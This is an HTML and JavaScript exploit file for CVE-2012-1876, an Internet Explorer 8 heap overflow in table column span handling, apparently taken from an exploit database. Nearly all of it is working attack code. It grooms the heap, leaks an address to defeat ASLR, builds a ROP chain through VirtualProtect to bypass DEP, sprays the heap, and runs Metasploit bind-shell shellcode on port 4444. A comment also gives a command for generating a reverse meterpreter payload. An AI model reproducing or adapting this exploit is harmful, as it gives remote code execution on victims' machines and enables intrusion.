257 lines
No EOL
9.8 KiB
HTML
257 lines
No EOL
9.8 KiB
HTML
<!--
|
|
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
|
|
** Author: sickness@offsec.com
|
|
** Thanks to Ryujin, Dookie and mr_me :) for their help.
|
|
|
|
####################################################################
|
|
|
|
** Affected Software: Internet Explorer 8
|
|
** Vulnerability: Fixed Col Span ID
|
|
** CVE: CVE-2012-1876
|
|
** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
|
|
** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
|
|
** Tested on Windows 7 (x86) - IE 8.0.7601.17514
|
|
** Old version of the exploit available at: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24017-old.zip
|
|
|
|
####################################################################
|
|
|
|
** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)
|
|
** To get it working on a different version of Windows you will require to make your own chances to the exploit :)
|
|
** Have fun :)
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<div id="evil"></div>
|
|
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
|
|
<script language='javascript'>
|
|
|
|
function strtoint(str) {
|
|
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
|
|
}
|
|
|
|
var free = "EEEE";
|
|
while ( free.length < 500 ) free += free;
|
|
|
|
var string1 = "AAAA";
|
|
while ( string1.length < 500 ) string1 += string1;
|
|
|
|
var string2 = "BBBB";
|
|
while ( string2.length < 500 ) string2 += string2;
|
|
|
|
var fr = new Array();
|
|
var al = new Array();
|
|
var bl = new Array();
|
|
|
|
var div_container = document.getElementById("evil");
|
|
div_container.style.cssText = "display:none";
|
|
|
|
for (var i=0; i < 500; i+=2) {
|
|
fr[i] = free.substring(0, (0x100-6)/2);
|
|
al[i] = string1.substring(0, (0x100-6)/2);
|
|
bl[i] = string2.substring(0, (0x100-6)/2);
|
|
var obj = document.createElement("button");
|
|
div_container.appendChild(obj);
|
|
}
|
|
|
|
for (var i=200; i<500; i+=2 ) {
|
|
fr[i] = null;
|
|
CollectGarbage();
|
|
}
|
|
|
|
function heapspray(cbuttonlayout) {
|
|
CollectGarbage();
|
|
var rop = cbuttonlayout + 4161; // RET
|
|
var rop = rop.toString(16);
|
|
var rop1 = rop.substring(4,8);
|
|
var rop2 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 11360; // POP EBP
|
|
var rop = rop.toString(16);
|
|
var rop3 = rop.substring(4,8);
|
|
var rop4 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
|
|
var rop = rop.toString(16);
|
|
var rop5 = rop.substring(4,8);
|
|
var rop6 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 12377; // POP EBX
|
|
var rop = rop.toString(16);
|
|
var rop7 = rop.substring(4,8);
|
|
var rop8 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 642768; // POP EDX
|
|
var rop = rop.toString(16);
|
|
var rop9 = rop.substring(4,8);
|
|
var rop10 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
|
|
var rop = rop.toString(16);
|
|
var rop11 = rop.substring(4,8);
|
|
var rop12 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 5504544; // Writable location
|
|
var rop = rop.toString(16);
|
|
var writable1 = rop.substring(4,8);
|
|
var writable2 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 12462; // POP EDI
|
|
var rop = rop.toString(16);
|
|
var rop13 = rop.substring(4,8);
|
|
var rop14 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 12043; // POP ESI --> changed
|
|
var rop = rop.toString(16);
|
|
var rop15 = rop.substring(4,8);
|
|
var rop16 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 63776; // JMP EAX
|
|
var rop = rop.toString(16);
|
|
var jmpeax1 = rop.substring(4,8);
|
|
var jmpeax2 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 85751; // POP EAX
|
|
var rop = rop.toString(16);
|
|
var rop17 = rop.substring(4,8);
|
|
var rop18 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 4936; // VirtualProtect()
|
|
var rop = rop.toString(16);
|
|
var vp1 = rop.substring(4,8);
|
|
var vp2 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
|
|
var rop = rop.toString(16);
|
|
var rop19 = rop.substring(4,8);
|
|
var rop20 = rop.substring(0,4); // } RET
|
|
|
|
var rop = cbuttonlayout + 234657; // PUSHAD
|
|
var rop = rop.toString(16);
|
|
var rop21 = rop.substring(4,8);
|
|
var rop22 = rop.substring(0,4); // } RET
|
|
|
|
|
|
var rop = cbuttonlayout + 408958; // PUSH ESP
|
|
var rop = rop.toString(16);
|
|
var rop23 = rop.substring(4,8);
|
|
var rop24 = rop.substring(0,4); // } RET
|
|
|
|
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
|
|
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
|
|
shellcode+= unescape("%u4141%u4141"); // PADDING
|
|
|
|
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
|
|
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
|
|
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
|
|
|
|
// Standard DEP bypass
|
|
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
|
|
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
|
|
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
|
|
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
|
|
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
|
|
shellcode+= unescape("%u0040%u0000"); // 0x00000040
|
|
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
|
|
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
|
|
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
|
|
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
|
|
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
|
|
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
|
|
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
|
|
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
|
|
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
|
|
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
|
|
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
|
|
shellcode+= unescape("%u9090%u9090"); // NOPs
|
|
shellcode+= unescape("%u9090%u9090"); // NOPs
|
|
shellcode+= unescape("%u9090%u9090"); // NOPs
|
|
|
|
// Bind shellcode on 4444 :)
|
|
// msf > generate -t js_le
|
|
// windows/shell_bind_tcp - 342 bytes
|
|
// http://www.metasploit.com
|
|
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
|
|
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
|
|
// I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp
|
|
// You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le
|
|
|
|
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
|
|
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
|
|
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
|
|
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
|
|
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
|
|
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
|
|
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
|
|
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
|
|
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
|
|
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
|
|
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
|
|
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
|
|
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
|
|
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
|
|
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
|
|
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
|
|
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
|
|
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
|
|
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
|
|
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
|
|
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
|
|
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
|
|
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
|
|
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
|
|
"%u006a%uff53%u41d5");
|
|
|
|
// Total spray should be 1000
|
|
var padding = unescape("%u9090");
|
|
while (padding.length < 1000)
|
|
padding = padding + padding;
|
|
var padding = padding.substr(0, 1000 - shellcode.length);
|
|
|
|
shellcode+= padding;
|
|
|
|
while (shellcode.length < 100000)
|
|
shellcode = shellcode + shellcode;
|
|
|
|
var onemeg = shellcode.substr(0, 64*1024/2);
|
|
|
|
for (i=0; i<14; i++) {
|
|
onemeg += shellcode.substr(0, 64*1024/2);
|
|
}
|
|
|
|
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
|
|
|
|
var spray = new Array();
|
|
|
|
for (i=0; i<100; i++) {
|
|
spray[i] = onemeg.substr(0, onemeg.length);
|
|
}
|
|
}
|
|
|
|
function leak(){
|
|
var leak_col = document.getElementById("132");
|
|
leak_col.width = "41";
|
|
leak_col.span = "19";
|
|
}
|
|
|
|
function get_leak() {
|
|
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
|
|
str_addr = str_addr - 1410704;
|
|
var hex = str_addr.toString(16);
|
|
//alert(hex);
|
|
setTimeout(function(){heapspray(str_addr)}, 50);
|
|
}
|
|
|
|
function trigger_overflow(){
|
|
var evil_col = document.getElementById("132");
|
|
evil_col.width = "1245880";
|
|
evil_col.span = "44";
|
|
}
|
|
|
|
setTimeout(function(){leak()}, 400);
|
|
setTimeout(function(){get_leak()},450);
|
|
setTimeout(function(){trigger_overflow()}, 700);
|
|
|
|
</script>
|
|
</body>
|
|
</html> |